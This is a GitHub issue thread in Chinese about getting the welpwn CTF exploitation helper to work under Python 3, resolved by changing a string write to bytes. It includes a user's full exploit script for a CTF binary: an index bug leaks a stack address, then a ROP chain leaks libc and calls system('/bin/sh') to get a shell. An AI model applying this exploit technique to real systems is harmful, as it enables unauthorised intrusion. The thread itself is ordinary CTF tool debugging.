### ISSUE TITLE
python3 support?

### ISSUE THREAD

**Issue by sln-1550** [matrix1001/welpwn#10]
python2已经过时了，我用welpwn在py3下面可以安装，修改了一些str和bytes的错误以后可以运行，但是用python2可以正常getshell的，用python3就死活不行，我发现程序刚运行的时候有报错：
[*] set env={'LD_PRELOAD': '/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6', 'LD_LIBRARY_PATH': '/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/'} for debugging remote libc
[+] Starting local process '/tmp/pwn/tls_debug' env={b'LD_PRELOAD': b'/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6', b'LD_LIBRARY_PATH': b'/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/'} : pid 54081
error writing: 0x7fff426b5f43:0x0
error writing: 0x7fff426b5f96:0x0
请问这是啥问题？怎么解决下？

**Comment by matrix1001** [comment]
@sln-1550 附上代码

**Comment by sln-1550** [comment]
from PwnContext import *
import time
context.log_level = "debug"
ctx.binary = './tls'
ctx.remote = ('1.1.1.1', 1111)
ctx.custom_lib_dir = '/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/'
e=ELF(ctx.custom_lib_dir+'libc.so.6')
gadgets=one_gadgets(ctx.custom_lib_dir+'libc.so.6')
#ctx.remote_libc = './libc.so.6'
#e=ctx.remote_libc
malloc_hook=e.symbols['__malloc_hook']
realloc=e.symbols['realloc']
free_hook=e.symbols['__free_hook']
puts=e.symbols['puts']
system=e.symbols['system']
ctx.breakpoints = [0x401140,0x40112c,0x400Ea7]
ctx.debug_remote_libc = True
ctx.start()
#ctx.start('remote')
#ctx.debug()

def sel(ind):
    ctx.sendlineafter("Your choice: ","1")
    ctx.sendlineafter("input pos:",str(ind))

def put(name):
    ctx.sendlineafter("Your choice: ","2")
    ctx.sendlineafter("new number: ",str(name))


ctx.sendlineafter("How many?","1")
ctx.sendlineafter("num_list[0]","0")
sel(-4)
put(55)
ctx.sendlineafter("Your choice: ","3")
ctx.recvuntil("result = ")
buf=ctx.recvuntil("\n")
rbp=int(buf)-0x7f0
log.info("rbp = 0x%08x"%rbp)
sel(56)
put(rbp-0x40)
sel(57)
put(0x401140)
ctx.sendlineafter("Your choice: ","4")
payload=p64(1)
payload+=p64(0x40128C)  #csu
payload+=p64(0x601FA0)  #got of read
payload+=p64(0x1000) #rdx
payload+=p64(rbp-8+0x38)  #rsi
payload+=p64(0)  #rdi
payload+=p64(0x401270)

ctx.sendafter("r name?",payload)
#start classic ROP 
payload=p64(0x401293)  #pop rdi;ret
payload+=p64(0x601F88)  #got of puts
payload+=p64(0x400B00)  #puts
payload+=p64(0x40128A)  #csu
payload+=p64(0)         #rbx
payload+=p64(1)         #rbp
payload+=p64(0x601FA0)  #got of read
payload+=p64(0x1000) #rdx
payload+=p64(rbp+0x30+0x48+0x48)  #rsi
payload+=p64(0)  #rdi
payload+=p64(0x401270)
ctx.recvuntil("GoodBye.")
ctx.recvuntil("\n")
ctx.sendline(payload)

buf=ctx.recv(6)  #get puts
addr=u64(buf.ljust(8,b'\x00'))
log.info("puts @ 0x%08x"%addr)
libc=addr-puts
log.info("libc @ 0x%08x"%libc)

payload=p64(0x401293)
payload+=p64(rbp+0x30+0x48+0x60)
payload+=p64(libc+system)
payload+=b'/bin/sh\x00'
#payload=p64(libc+gadgets[3])
ctx.sendline(payload)

ctx.interactive()

**Comment by matrix1001** [comment]
@sln-1550 这个报错是出在`proc.Proc.write`函数里面，也就是只有尝试修改内存的时候，可能会出现，有可能是调用了`ctx.write`或者`ctx.proc.write`，但是我看代码里面没有，是不是改源码时候出了问题，你可以把自己解决python3的问题版本提交一份PR我看看

**Comment by sln-1550** [comment]
我也不太明白，改的部分只涉及str和bytes的部分，就是哪里有报错，就去改了那里，没有去增加写内存的操作。

**Comment by sln-1550** [comment]
如果我不用glibc-all-in-one的库，用第三方的库，就会报错：

[*] set env={'LD_PRELOAD': '/mnt/hgfs/share/20210426/libc.so.6'} for debugging remote libc
[+] Starting local process '/tmp/pwn/tls_debug' env={b'LD_PRELOAD': b'/mnt/hgfs/share/20210426/libc.so.6'} : pid 57381
Traceback (most recent call last):
  File "exp_tls.py", line 19, in <module>
    ctx.start()
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/core.py", line 351, in start
    self.patch_environ()
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/core.py", line 65, in wrapper
    ret_val = method(self, *args, **kargs)
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/core.py", line 406, in patch_environ
    p.write(addr, 0)
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/proc.py", line 369, in write
    f = open(mem, 'wb')
PermissionError: [Errno 13] Permission denied: '/proc/57381/mem'

然后我查看proc.py的内容，有这么一段：
359     def write(self, addr, data):
360         '''Write to the memory of the process.
361 
362         Args:
363             addr (int): The start address.
364             data (str or byte): Data to write.
365         Returns:
366             int: bytes written.
367         '''
368         mem = "/proc/{}/mem".format(self.pid)
369         f = open(mem, 'wb')
370         f.seek(addr)
371         try:
372             result = f.write(data)
373         except:
374             result = 0
375             print("error writing: {}:{}".format(hex(addr), hex(data)))
376         f.close()
377         return result

**Comment by sln-1550** [comment]
发现python3运行的时候，都是一样进入system函数中了，execve的参数也是一样的，但是只要退出了gdb，被调试的进程就立即退出了。

**Comment by sln-1550** [comment]
我把代码还原了一下，然后执行第一步报了这个错误：
[*] '/tmp/pwn/tls_debug'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] set env={'LD_PRELOAD': '/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6', 'LD_LIBRARY_PATH': '/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/'} for debugging remote libc
[+] Starting local process '/tmp/pwn/tls_debug' env={b'LD_PRELOAD': b'/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6', b'LD_LIBRARY_PATH': b'/home/test/tools/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/'} : pid 2770
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/proc.py", line 372, in write
    result = f.write(data)
TypeError: a bytes-like object is required, not 'str'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "exp_tls.py", line 20, in <module>
    ctx.start()
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/core.py", line 351, in start
    self.patch_environ()
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/core.py", line 65, in wrapper
    ret_val = method(self, *args, **kargs)
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/core.py", line 406, in patch_environ
    p.write(addr, '\0')
  File "/usr/local/lib/python3.6/dist-packages/welpwn-0.97-py3.6.egg/PwnContext/proc.py", line 375, in write
    print("error writing: {}:{}".format(hex(addr), hex(data)))
TypeError: 'str' object cannot be interpreted as an integer

你说的写内存应该就是这里了。

**Comment by matrix1001** [comment]
应该就是这两处write需要处理了，你自己改改看看，如果可以的话，提交一份pull request，不会的话可以查一下看看怎么弄 @sln-1550

**Comment by sln-1550** [comment]
这次只修改了一个地方，发现就可以工作了：
修改PwnContext/core.py第406行
p.write(addr, '\0')  改成 p.write(addr, b'\0')  即可
谢谢指导。
